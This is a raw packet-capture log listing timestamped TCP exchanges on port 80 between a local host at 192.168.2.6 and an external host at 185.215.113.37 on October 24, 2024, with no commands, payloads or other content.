Oct 24, 2024 13:02:15.188102007 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:15.188119888 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:15.188155890 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:15.188909054 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:15.188930988 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:15.188947916 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:15.188956022 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:15.188977957 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:15.188993931 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:15.188993931 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:15.189006090 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:15.189017057 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:15.189034939 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:15.189043045 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:15.189060926 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:15.189076900 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:15.189115047 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:15.189764977 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:15.189785004 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:15.189806938 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:15.189817905 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:15.189832926 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:15.189841986 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:15.189851046 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:15.189867973 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:15.189877987 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:15.189896107 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:15.189904928 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:15.189934015 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:15.190701962 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:15.190721989 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:15.190742970 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:15.190752029 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:15.190766096 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:15.190779924 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:15.190785885 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:15.190804005 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:15.190825939 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:15.190833092 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:15.190843105 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:15.190860987 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:15.190866947 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:15.190896034 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:15.191680908 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:15.191705942 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:15.191721916 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:15.191730976 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:15.191746950 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:15.191761017 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:15.191768885 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:15.191787004 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:15.191804886 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:15.191817999 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:15.191826105 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:15.191843987 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:15.191881895 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:15.192766905 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:15.192795992 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:15.192816019 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:15.192826033 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:15.192837954 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:15.192853928 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:15.192862988 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:15.192881107 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:15.192890882 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:15.192908049 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:15.192917109 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:15.192944050 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:15.193392992 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:15.193417072 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:15.193435907 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:15.193451881 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:15.193468094 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:15.214679956 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:15.214734077 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:15.214756966 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:15.214797020 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:15.214837074 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:15.215116024 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:15.215136051 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:15.215158939 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:15.215178013 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:15.215186119 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:15.215219975 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:15.215936899 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:15.215972900 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:15.215993881 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:15.216015100 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:15.216027021 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:15.216044903 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:15.216057062 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:15.216073990 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:15.216088057 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:15.216525078 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:15.216546059 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:15.216568947 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:15.216588020 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:15.216594934 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:15.216614008 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:15.216638088 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:15.217329025 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:15.217386007 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:15.226030111 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:15.226105928 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:15.226186037 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:15.226208925 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:15.226231098 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:15.226262093 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:15.226466894 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:15.226486921 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:15.226506948 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:15.226531982 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:15.273996115 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:15.274168015 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:15.274190903 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:15.274233103 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:15.274266005 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:15.671112061 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:15.677053928 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:15.958122969 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:15.958195925 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:15.958211899 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:15.958231926 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:15.958251953 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:15.958270073 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:15.958524942 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:15.958539963 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:15.958566904 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:15.958575964 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:15.958594084 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:15.958602905 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:15.958611965 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:15.958678007 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:15.959162951 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:15.959181070 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:15.959203005 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:15.959212065 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:15.959230900 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:15.959239006 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:15.959259987 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:15.959270000 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:15.959283113 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:15.959295988 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:15.960055113 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:15.960069895 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:15.960093975 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:15.960117102 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:15.960123062 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:15.960140944 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:15.960150003 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:15.960174084 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:15.960184097 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:15.960202932 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:15.960217953 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.078155994 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.078222990 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.078241110 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.078257084 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.078293085 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.078330040 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.078502893 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.078522921 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.078545094 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.078567028 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.078589916 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.078955889 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.078977108 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.078998089 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.079005957 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.079020977 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.079031944 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.079447031 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.079463005 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.079492092 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.079500914 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.079500914 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.079520941 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.079540014 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.079550982 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.079560041 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.079735994 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.080266953 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.080286980 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.080310106 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.080318928 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.080327988 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.080348015 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.080362082 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.080369949 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.080379963 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.080399036 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.080408096 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.080432892 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.081008911 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.081029892 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.081051111 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.081059933 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.081070900 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.081084967 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.081094027 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.081132889 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.081870079 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.081890106 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.081912994 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.081923962 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.081931114 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.081950903 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.081971884 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.081979990 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.081989050 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.082006931 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.082015991 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.082041979 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.082740068 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.082761049 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.082779884 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.082789898 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.082803965 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.082820892 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.082828999 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.082847118 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.082864046 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.082871914 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.082887888 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.082899094 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.082907915 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.082932949 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.083575964 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.083597898 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.083617926 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.083630085 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.083657026 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.083659887 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.083673954 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.083699942 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.084409952 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.084429026 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.084449053 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.084467888 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.084479094 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.084489107 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.084503889 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.084520102 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.084527969 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.084544897 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.084561110 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.085221052 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.085280895 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.199445009 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.199475050 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.199496984 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.199517012 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.199527025 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.199565887 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.199924946 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.199944973 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.199965000 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.199975967 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.199985027 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.200004101 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.200038910 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.200757980 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.200778008 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.200803995 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.200810909 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.200823069 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.200834036 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.200843096 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.200977087 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.201527119 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.201546907 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.201569080 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.201584101 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.201592922 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.201608896 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.201617956 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.201647997 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.202358007 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.202379942 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.202399015 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.202408075 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.202425003 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.202438116 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.202462912 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.203172922 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.203195095 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.203217030 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.203223944 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.203233004 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.203250885 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.203269005 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.203285933 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.203310013 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.204161882 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.204183102 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.204202890 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.204212904 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.204225063 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.204237938 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.204247952 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.204452038 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.205112934 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.205128908 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.205156088 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.205174923 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.205174923 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.205188036 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.205200911 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.205219984 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.205235004 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.205251932 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.205610991 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.205631018 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.205652952 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.205661058 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.205677032 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.205688953 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.205696106 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.205714941 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.205734968 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.205748081 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.206573009 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.206593990 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.206614017 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.206624985 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.206634998 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.206654072 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.206687927 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.207113981 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.207129955 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.207154036 CEST	80	49711	185.215.113.37	192.168.2.6
Oct 24, 2024 13:02:16.207161903 CEST	49711	80	192.168.2.6	185.215.113.37
Oct 24, 2024 13:02:16.207178116 CEST	49711	80	192.168.2.6	185.215.113.37
